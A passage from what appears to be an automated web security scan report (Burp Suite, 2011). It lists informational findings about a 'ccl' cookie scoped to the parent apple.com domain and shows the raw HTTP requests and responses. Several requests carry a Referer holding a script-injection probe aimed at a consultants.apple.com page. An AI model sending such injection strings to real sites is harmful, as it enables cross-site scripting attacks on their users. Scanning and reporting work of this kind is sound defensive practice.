Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3B
If-None-Match: "230-4a05bce73b440"
If-Modified-Since: Thu, 07 Apr 2011 22:41:13 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Thu, 07 Apr 2011 22:41:13 GMT
ETag: "230-4a05bce73b440"
Cache-Control: max-age=566
Expires: Thu, 21 Jul 2011 20:34:25 GMT
Date: Thu, 21 Jul 2011 20:24:59 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=Ezx1Pkt3abA8NdS1czF+LqquA3OuoHceeKsm/ZvVkOd6+SwlkwcU1h6evC+MH8jMKdJzxj8LVTQSs4MARUcwhm5iv2kqgpVN0VYmDLdUBoGitlq1D+bvTLKATmqdgOg3NWCFMByIEWdvoIcWdlK3N35TM9bpxza5M7EoPFTfTElRo6cucID3wdp4k8SYf70eeqCPBuv9w8Q97hm+2PKuwEOLQHSBUwvinfkcX2Fy9CH0JW14l8jhda2D0e6IDuIvBtrGBVRS5/L7kFK2tBS08+/0yvnQi2Ak7kcbE0LTNZ7og5u0m+plwqwKQDpFCkgVh5wMRGBFferRpm5YjN5B38dMWymTjcU2JUFWF2wwckqlv6hJ3WkFmUEYDFyA42xAQpdghOglJvDBmc4fhks8EFwhAgEGCzzEZowKGbobFWxKprQz/rB2Apfms1aUA5xf44r1YzaBA/ObfRpSvVID65ZawD/P63VeTzfFE4Px+9GrP5XkCDAgD3ue36fdNwpiHFA5cJiXTKw8PlOt0RX52uutKNLpn7oHk2uOynAHESbYN8s6ZNo9mV4GsbgaiTra; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.94. http://images.apple.com/global/scripts/swap_view.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/swap_view.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=QOh4jx4Itby8kQi9jnQohd5AKVIII6cRIYTkpKCO03bAmYZA/0w5mescjVOcsvojYmjDgGwuiBbRTOwAaNmf1owHz9aa9dq1YcUWRGoz6Egi0JJnrFN9p6wBK/loeP1UNplt4Cs1gXlO6+t6b9/HaKACfBIgZuQCzB2I4rZjFKnK6gnYSbX5dHDFHGyMkM7VevaCP5U6HUKrleSyRv5Ugpq0x/e9nwSd5cxyqeLPEeDkSgIFqXt2pp3QXaGa1r77lEzqJLH7jjXU+Xi9vKK+2MW2vrPRTHhc+G57RvefvU+65L6t7VXHzZGxQsBmY1trSjTZGG+2RaG+otgWBh1D1C7M1K0B6GYx8dGhYwgKEI9MLalzdqCgo88cB2PrVPfM4eQcPhMHjiXk/E5VNlUFLOG1kHPAPF9RKghSU3kPLD6Hvhlu6a2uBdLDQQQjZINLqUJ4+ShWKF7YEe2GWzJnjdLKu2UzVYElW7s9jmHu/g0Vh8PeM4jAtpoVt8t9GO1QQ4nKLrtqai+4Nagf8v2PrfwGorxJmPJN1RabM607fQDFqHZ/xoabRPrSfFQ0G4RO; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/swap_view.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 20 Jul 2011 02:16:35 GMT
ETag: "105f0-4a876d25166c0"
Vary: Accept-Encoding
Server: Apache/2.2.3 (Oracle)
Content-Length: 67056
Cteonnt-Length: 67056
Content-Type: application/x-javascript
Cache-Control: max-age=297
Expires: Thu, 21 Jul 2011 20:44:51 GMT
Date: Thu, 21 Jul 2011 20:39:54 GMT
Connection: close
Set-Cookie: ccl=QOh4jx4Itby8kQi9jnQohd5AKVIII6cRIYTkpKCO03bAmYZA/0w5mescjVOcsvojYmjDgGwuiBbRTOwAaNmf1owHz9aa9dq1YcUWRGoz6Egi0JJnrFN9p6wBK/loeP1UNplt4Cs1gXlO6+t6b9/HaKACfBIgZuQCzB2I4rZjFKnK6gnYSbX5dHDFHGyMkM7VevaCP5U6HUKrleSyRv5Ugpq0x/e9nwSd5cxyqeLPEeDkSgIFqXt2pp3QXaGa1r77lEzqJLH7jjXU+Xi9vKK+2MW2vrPRTHhc+G57RvefvU+65L6t7VXHzZGxQsBmY1trSjTZGG+2RaG+otgWBh1D1C7M1K0B6GYx8dGhYwgKEI9MLalzdqCgo88cB2PrVPfM4eQcPhMHjiXk/E5VNlUFLOG1kHPAPF9RKghSU3kPLD6Hvhlu6a2uBdLDQQQjZINLqUJ4+ShWKF7YEe2GWzJnjdLKu2UzVYElW7s9jmHu/g0Vh8PeM4jAtpoVt8t9GO1QQ4nKLrtqai+4Nagf8v2PrfwGorxJmPJN1RabM607fQDFqHZ/xoabRPrSfFQ0G4RO; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

if(typeof(AC)==="undefined"){AC={}}if(typeof(document.event)==="undefined"){document.event={}
}if(Event.Publisher){Object.extend(document.event,Event.Publisher)}AC.SwapView=Class.create({_view:null,cu
...[SNIP]...

10.95. http://images.apple.com/global/scripts/view_master_tracker.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/scripts/view_master_tracker.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=7IFllsyCCVnGt8q7GQXRaNThWwUx+MVHqCK8MQQytNQ/tr4v/g4yGiKKTpL4zros2/u8oSRD7FPcUZfeNxpwb800p5i7SO9Jw2kruLgM97GcrpE2C2KWrYrxgGghn2/LFg+7tavOS6ZmT82L6VcFLq6HrCA81JuHHhoG4pA9L4QrOndW4FZ9RZtnOgk24AAso67bpIhBFAoK69MZHpvUXW7C91waBEigMlnz9bXge2zDAJ/RzkFk0o6zQ/I0DOMZpNU5BnmIuavPfwtWXEKQlrZKa+nxIJseI2lpYR/TQeCRAiTFWp9aP+Rv/kbtZ6M/mDeg6FQldQgsvwbsG1995NjAewXYbTd0chk7RGqZcIboivju4a8h+L4b3WFW1TX3wjLhfXewNa64+Eybs6UadRCgNolgN367HXp6/dPTrmKftyn+PkNQKegOwv34Qce4HN675kWgBPlPq8Z6Q6+OBJlj/rBa2eTUJH0SqNKs1TBcPg/8kWxYLr9MiME+fto0JsKJiyE+biJoP4u+U0iByMvRaJpeUL2lE5Z7OBFIDPX5PrCZifVIpR7znYTPkd9U; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/scripts/view_master_tracker.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 28 Apr 2011 22:13:30 GMT
ETag: "243c-4a201ddff3680"
Vary: Accept-Encoding
Server: Apache/2.2.3 (Oracle)
X-Cached-Time: Thu, 28 Apr 2011 22:41:24 GMT
X-Cache-TTL: 600
Cteonnt-Length: 9276
Content-Type: application/x-javascript
Content-Length: 9276
Cache-Control: max-age=388
Expires: Thu, 21 Jul 2011 20:46:22 GMT
Date: Thu, 21 Jul 2011 20:39:54 GMT
Connection: close
Set-Cookie: ccl=7IFllsyCCVnGt8q7GQXRaNThWwUx+MVHqCK8MQQytNQ/tr4v/g4yGiKKTpL4zros2/u8oSRD7FPcUZfeNxpwb800p5i7SO9Jw2kruLgM97GcrpE2C2KWrYrxgGghn2/LFg+7tavOS6ZmT82L6VcFLq6HrCA81JuHHhoG4pA9L4QrOndW4FZ9RZtnOgk24AAso67bpIhBFAoK69MZHpvUXW7C91waBEigMlnz9bXge2zDAJ/RzkFk0o6zQ/I0DOMZpNU5BnmIuavPfwtWXEKQlrZKa+nxIJseI2lpYR/TQeCRAiTFWp9aP+Rv/kbtZ6M/mDeg6FQldQgsvwbsG1995NjAewXYbTd0chk7RGqZcIboivju4a8h+L4b3WFW1TX3wjLhfXewNa64+Eybs6UadRCgNolgN367HXp6/dPTrmKftyn+PkNQKegOwv34Qce4HN675kWgBPlPq8Z6Q6+OBJlj/rBa2eTUJH0SqNKs1TBcPg/8kWxYLr9MiME+fto0JsKJiyE+biJoP4u+U0iByMvRaJpeUL2lE5Z7OBFIDPX5PrCZifVIpR7znYTPkd9U; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

AC.ViewMaster.Tracker=Class.create();Object.extend(AC.ViewMaster.Tracker.prototype,Event.Listener);
Object.extend(AC.ViewMaster.Tracker.prototype,{count:0,type:"",isReplay:false,ccTime:0,mediaType:"",
...[SNIP]...

10.96. http://images.apple.com/global/styles/base.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/global/styles/base.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=nJ3IWRo4rjwalU5apUibcahtVnWwpmJjRdlEY9a/CmnllC4WvKQm5K4paNU56mnhoz0Qp5hYxDMkI+RADy1uOSOVTBaySyLsWkUR+eMyJ8lPSTT6ZvveH/MKEUBGhgIonx5Gv7f5e5zXLMcyUclPxSldzDnk19Y55Kzdjq7wKPzLARtkG5T73XVUNfqkw00/4roAFD226al/ZZ1pOTrMbx6+yzARCfmttQRdBLkNmNLVDJT8IGbgtZVfuC+JbSjzo6RpoPoVsh2GR2OosgB+TQNQk1fwtgAPeE4MsdNPfgqAmuhwPwvh7kN6OpvrJjlYGjxglXSR6twpBkF6y3RiJizDI3VC3XvudKL0Q6DRPeKtHZc1MQ9ykE6VDx5vl+eRXHWECmTzOjsUxgyHT6o/Hc/n9UuoaEKVNGLvuHp+WcnAIohxbRlJEo1IgYbk0Va6QGM4Ccm6slb3CRix+FFyOYAa/GXg5bf9gSR1pCpEyFjVZ9cGI+L3RuE4syQ8vekDdKQmyXcv3DwZ61DlMxpDzEUOdOW6JtsD7Dc6xCbPvtA9/3WKfqJANum/I8qiTAVh; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /global/styles/base.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3B
If-None-Match: "7d0c-4a28e6fd30a00"
If-Modified-Since: Thu, 05 May 2011 21:55:52 GMT

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 20 Jul 2011 02:16:42 GMT
ETag: "87cd-4a876d2bc3680"
Vary: Accept-Encoding
Cteonnt-Length: 34765
Content-Type: text/css
Server: Apache/2.2.14 (Unix)
Content-Length: 34765
Cache-Control: max-age=317
Expires: Thu, 21 Jul 2011 20:30:16 GMT
Date: Thu, 21 Jul 2011 20:24:59 GMT
Connection: close
Set-Cookie: ccl=nJ3IWRo4rjwalU5apUibcahtVnWwpmJjRdlEY9a/CmnllC4WvKQm5K4paNU56mnhoz0Qp5hYxDMkI+RADy1uOSOVTBaySyLsWkUR+eMyJ8lPSTT6ZvveH/MKEUBGhgIonx5Gv7f5e5zXLMcyUclPxSldzDnk19Y55Kzdjq7wKPzLARtkG5T73XVUNfqkw00/4roAFD226al/ZZ1pOTrMbx6+yzARCfmttQRdBLkNmNLVDJT8IGbgtZVfuC+JbSjzo6RpoPoVsh2GR2OosgB+TQNQk1fwtgAPeE4MsdNPfgqAmuhwPwvh7kN6OpvrJjlYGjxglXSR6twpBkF6y3RiJizDI3VC3XvudKL0Q6DRPeKtHZc1MQ9ykE6VDx5vl+eRXHWECmTzOjsUxgyHT6o/Hc/n9UuoaEKVNGLvuHp+WcnAIohxbRlJEo1IgYbk0Va6QGM4Ccm6slb3CRix+FFyOYAa/GXg5bf9gSR1pCpEyFjVZ9cGI+L3RuE4syQ8vekDdKQmyXcv3DwZ61DlMxpDzEUOdOW6JtsD7Dc6xCbPvtA9/3WKfqJANum/I8qiTAVh; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

/* RESET */
html,body,div,ul,ol,li,dl,dt,dd,h1,h2,h3,h4,h5,h6,pre,form,p,blockquote,fieldset,input,abbr,article,aside,command,details,figcaption,figure,footer,header,hgroup,mark,meter,nav,output,progr
...[SNIP]...

10.97. http://images.apple.com/macpro/scripts/pagenav.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/macpro/scripts/pagenav.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=bY8lS6xZAGWbmWRFuc3xh/9dnR28FoZWwtpTqptUdgAV+Uc8maZ3uG7zk9Bg6lZH1rOO4gy76RWvGtPZLTeJbQhJ8WjnDDCGvqcXBPMtdP1uyTtE1T1+M90glWdKq5r5dnOnHYrX9QPWelnvU/8ycikpBsjR0AeagO+L5gY8nTiOivMiRfKCg0lesRfdS1s/VDNoK1HKE/lWZCJpcosN6Ah+8I2Rh1SmkNF1Q8pvmegi+ah3i5hcElOZJkifleDuns2oHOG5iEDXEwkpAYIkO+Scykv+qz42oppQXbfYRd/1ewsxxu3FH5nj0y8orNjgP7sHHVPwvJXmEbgwnjLIOwFyGGUkDesgmrMpE6n+a/KJZYnqJlrXXgVLT2ns3uiGyN/O3oOtBxHlHZT4EToNStQ6vcUPdww3NlZ2t0jqr+KnTyy8unAzhrVzCpqhr3Y5+8dlBamMOiwFaA6uBFoapHXkxDczUQ71k30oSe3rsPKATpxVjET3JqURqeqM8xIhz5+QicS8ukucXoPmWY049aIBGCa5/XoCD8whPsTspwI4wMaJT6e/yxtMu2eI2S8Z; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /macpro/scripts/pagenav.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b

Response

HTTP/1.1 200 OK
Last-Modified: Sun, 13 Jan 2008 02:48:33 GMT
ETag: "7ca-4439198664240"
Vary: Accept-Encoding
Server: Apache/2.2.3 (Oracle)
X-N: S
nnCoection: close
X-Cached-Time: Fri, 04 Mar 2011 15:19:52 GMT
Content-Type: application/x-javascript
Cteonnt-length: 1994
Content-Length: 1994
Cache-Control: max-age=301
Expires: Thu, 21 Jul 2011 20:44:55 GMT
Date: Thu, 21 Jul 2011 20:39:54 GMT
Connection: close
Set-Cookie: ccl=bY8lS6xZAGWbmWRFuc3xh/9dnR28FoZWwtpTqptUdgAV+Uc8maZ3uG7zk9Bg6lZH1rOO4gy76RWvGtPZLTeJbQhJ8WjnDDCGvqcXBPMtdP1uyTtE1T1+M90glWdKq5r5dnOnHYrX9QPWelnvU/8ycikpBsjR0AeagO+L5gY8nTiOivMiRfKCg0lesRfdS1s/VDNoK1HKE/lWZCJpcosN6Ah+8I2Rh1SmkNF1Q8pvmegi+ah3i5hcElOZJkifleDuns2oHOG5iEDXEwkpAYIkO+Scykv+qz42oppQXbfYRd/1ewsxxu3FH5nj0y8orNjgP7sHHVPwvJXmEbgwnjLIOwFyGGUkDesgmrMpE6n+a/KJZYnqJlrXXgVLT2ns3uiGyN/O3oOtBxHlHZT4EToNStQ6vcUPdww3NlZ2t0jqr+KnTyy8unAzhrVzCpqhr3Y5+8dlBamMOiwFaA6uBFoapHXkxDczUQ71k30oSe3rsPKATpxVjET3JqURqeqM8xIhz5+QicS8ukucXoPmWY049aIBGCa5/XoCD8whPsTspwI4wMaJT6e/yxtMu2eI2S8Z; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

PageNav = Class.create();
PageNav.prototype = {

   initialize: function(containerId, contentPrefix, contentId, contentTag) {
       this.container = $(containerId);
       this.content = $(contentId);

       this.ge
...[SNIP]...

10.98. http://images.apple.com/macpro/scripts/performance.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/macpro/scripts/performance.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=pmWhRGeM3dXD4J38m3gIH86TAMIqjPWR3jW6M0fkWj3nVp7hT1FIS8/OVCmgmWsDeswgD1tIkHDND6aZ+vVWsn5TFz+flQBpkwAk4wUCzZIXfRbBxNdNmvZpC3GRlGSj/g4eX2vTjTTbpNw0CQw6c9HTSVM3ZfiD3IhKgtWfdS0aftATQU6ZowQiDkFDNczy1VtwReIIkfQufJF4geX71ql0AOtERpZXgd1zMGAS1sNj2EGe11BGncUiPHQb/sXRJuVxzgyhYsinBhNmMGndw3eXlcsHmGAAN7HY/lLss9A+yvEhmWIQ/vOUWFhmoCCoqo9UEdAnTVa33yD4D+d+Y/G2/0hM1sGfYvau/r3J2yh0wFzk99vtfjhg7w4CB94fcIsy0F3AqDWyx2UqYs5B3erd0x6yrY6sV3w6LuuTKWMxTMyorRAPlG9WadhRYYhIp/BNjwmd9Oyan5qSMrNYh0FmhU+M3JgD57yvlK1vGUG9Ly+SRpsSoDLRnKhhwiuoCkL/1QQ17Oo2tsf5du81nQ+vZi2fkry1SaO2k0I6hSySyc0CKFY0ZtUrHdQuQobh; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /macpro/scripts/performance.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 18 Nov 2010 00:36:10 GMT
ETag: "1155-49548f9ebb280"
Vary: Accept-Encoding
Server: Apache/2.2.14 (Unix)
X-Cached-Time: Tue, 28 Jun 2011 05:43:16 GMT
nnCoection: close
Cteonnt-Length: 4437
Content-Type: application/x-javascript
Content-Length: 4437
Cache-Control: max-age=272
Expires: Thu, 21 Jul 2011 20:44:26 GMT
Date: Thu, 21 Jul 2011 20:39:54 GMT
Connection: close
Set-Cookie: ccl=pmWhRGeM3dXD4J38m3gIH86TAMIqjPWR3jW6M0fkWj3nVp7hT1FIS8/OVCmgmWsDeswgD1tIkHDND6aZ+vVWsn5TFz+flQBpkwAk4wUCzZIXfRbBxNdNmvZpC3GRlGSj/g4eX2vTjTTbpNw0CQw6c9HTSVM3ZfiD3IhKgtWfdS0aftATQU6ZowQiDkFDNczy1VtwReIIkfQufJF4geX71ql0AOtERpZXgd1zMGAS1sNj2EGe11BGncUiPHQb/sXRJuVxzgyhYsinBhNmMGndw3eXlcsHmGAAN7HY/lLss9A+yvEhmWIQ/vOUWFhmoCCoqo9UEdAnTVa33yD4D+d+Y/G2/0hM1sGfYvau/r3J2yh0wFzk99vtfjhg7w4CB94fcIsy0F3AqDWyx2UqYs5B3erd0x6yrY6sV3w6LuuTKWMxTMyorRAPlG9WadhRYYhIp/BNjwmd9Oyan5qSMrNYh0FmhU+M3JgD57yvlK1vGUG9Ly+SRpsSoDLRnKhhwiuoCkL/1QQ17Oo2tsf5du81nQ+vZi2fkry1SaO2k0I6hSySyc0CKFY0ZtUrHdQuQobh; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

Event.onDOMReady(function(){$("promofooter").hide();new AC.ViewMaster.Viewer($$("#threedee-chart .view-content"),"view-threedee","view-threedee-link",{silentTriggers:true,shouldAnimateContentChange:fa
...[SNIP]...

10.99. http://images.apple.com/metrics/scripts/s_code_h.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/metrics/scripts/s_code_h.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=1feJpqNBoKHRzIn3m2Do2JhNRab7KsNr2B3KiNPmyVORh5FdrqXr2aSTI3bwRSZ43mChyXQ6H5W1qzp+1CPneJMoZGzToISFRrjZd5i1tnFNXBN++S7e5Kw4Eg0lDw/nBqaysNq92YGrN3KkfQeXohSV0fWGF1SDMOFVMT9STZf+3jwkPTqRCBWwXVyXOCRSXPc8JASCeFU5bG9NEm2ihqsdsBTNB2v1T8lVAfvjUTk8xKQOxm8Ze11wFUiZLNVWkzXvv4HSEZHW4Ijp9TXppRApIzpE2UNlYUQfKv98xEiTrLkqanwvkow0yGBcoL/soa+o9ZZEcGYB07TKA+ji/JqHyg1V2+KVpVAIHduPkWdDj9tkswKyxBLEzjYitsSMj0rdob+IhhAji+FmrI1cQc493i4NiIxEiNEAIYC/Qnh9nv4kYMX59xTFO7Yc9/bwlt3UNbXXlf2UauLVAPatCYOonfknvr2t6hwLyFCL0xtqDhq5aVpKSYAFvzwaJ+xsdhzv21dWl2BrfGtKf0auqlUpwjcqBsZJysmcQPm48Sy1/absFPm+HQQ0Dh4LnX1o; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /metrics/scripts/s_code_h.js HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3B
If-None-Match: "ed30-4a6ccd3839dc0"
If-Modified-Since: Tue, 28 Jun 2011 22:02:39 GMT

Response

HTTP/1.1 304 Not Modified
Content-Type: application/x-javascript
Last-Modified: Tue, 28 Jun 2011 22:02:39 GMT
ETag: "ed30-4a6ccd3839dc0"
Cache-Control: max-age=317
Expires: Thu, 21 Jul 2011 20:30:18 GMT
Date: Thu, 21 Jul 2011 20:25:01 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: ccl=1feJpqNBoKHRzIn3m2Do2JhNRab7KsNr2B3KiNPmyVORh5FdrqXr2aSTI3bwRSZ43mChyXQ6H5W1qzp+1CPneJMoZGzToISFRrjZd5i1tnFNXBN++S7e5Kw4Eg0lDw/nBqaysNq92YGrN3KkfQeXohSV0fWGF1SDMOFVMT9STZf+3jwkPTqRCBWwXVyXOCRSXPc8JASCeFU5bG9NEm2ihqsdsBTNB2v1T8lVAfvjUTk8xKQOxm8Ze11wFUiZLNVWkzXvv4HSEZHW4Ijp9TXppRApIzpE2UNlYUQfKv98xEiTrLkqanwvkow0yGBcoL/soa+o9ZZEcGYB07TKA+ji/JqHyg1V2+KVpVAIHduPkWdDj9tkswKyxBLEzjYitsSMj0rdob+IhhAji+FmrI1cQc493i4NiIxEiNEAIYC/Qnh9nv4kYMX59xTFO7Yc9/bwlt3UNbXXlf2UauLVAPatCYOonfknvr2t6hwLyFCL0xtqDhq5aVpKSYAFvzwaJ+xsdhzv21dWl2BrfGtKf0auqlUpwjcqBsZJysmcQPm48Sy1/absFPm+HQQ0Dh4LnX1o; path=/; domain=.apple.com
Set-Cookie: geo=US; path=/; domain=.apple.com

10.100. http://images.apple.com/support/css/base_new.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://images.apple.com
Path:	/support/css/base_new.css

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

ccl=/0ZX3eGtiz2N94LlrQRAkZzAM+tGhYMUJSxai0bwmBeI1dPPensQzY5Uty9ZlIOHIQTx3e60zFhRD6wMXmWNG926Lth/b8RjLMVCfZb7D5XbT3Dzmd93c9FsycW4PERXlZ3ycvoryZdz3+iNSPpF3jEkd6Iwedo6DKUcJxXiQPCmsq5B84TnqodRXIN41Os5MruCRagHNPml/PD83fqlyrp6Eah4dm713c10yU4DSe1ssFcZvJzMH1XiGUVgR8AZ0+k/K05YPhEhI01J2gZZji3qMvx5EphMLLteB32mWkWl3MNORmRAc6Fe+Tv8sV/ouT1xqrrb3C/9/vo3FPNIriwgYfHEUNRkaIYOGop4a9qfJk000LhgniRfVILO3khuwz54LEFRo+YplE//mp0nfYtMIpx3APNNKWmGpMqtElXz56voDUL5BEaC4Us1LVf6+0jaDoOhN/v9wIUOAQQ1xdU0uHO9YxmpWdWyHmQ4QTRGrK2eitc0M4r0/o8m+Hz+bzeUNNa7KrYyHu4O7h1CPxw1C1SET9/ArTDAGFrHfmWoFrXBm15q3+AkSAwWEteZ; path=/; domain=.apple.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/css/base_new.css HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
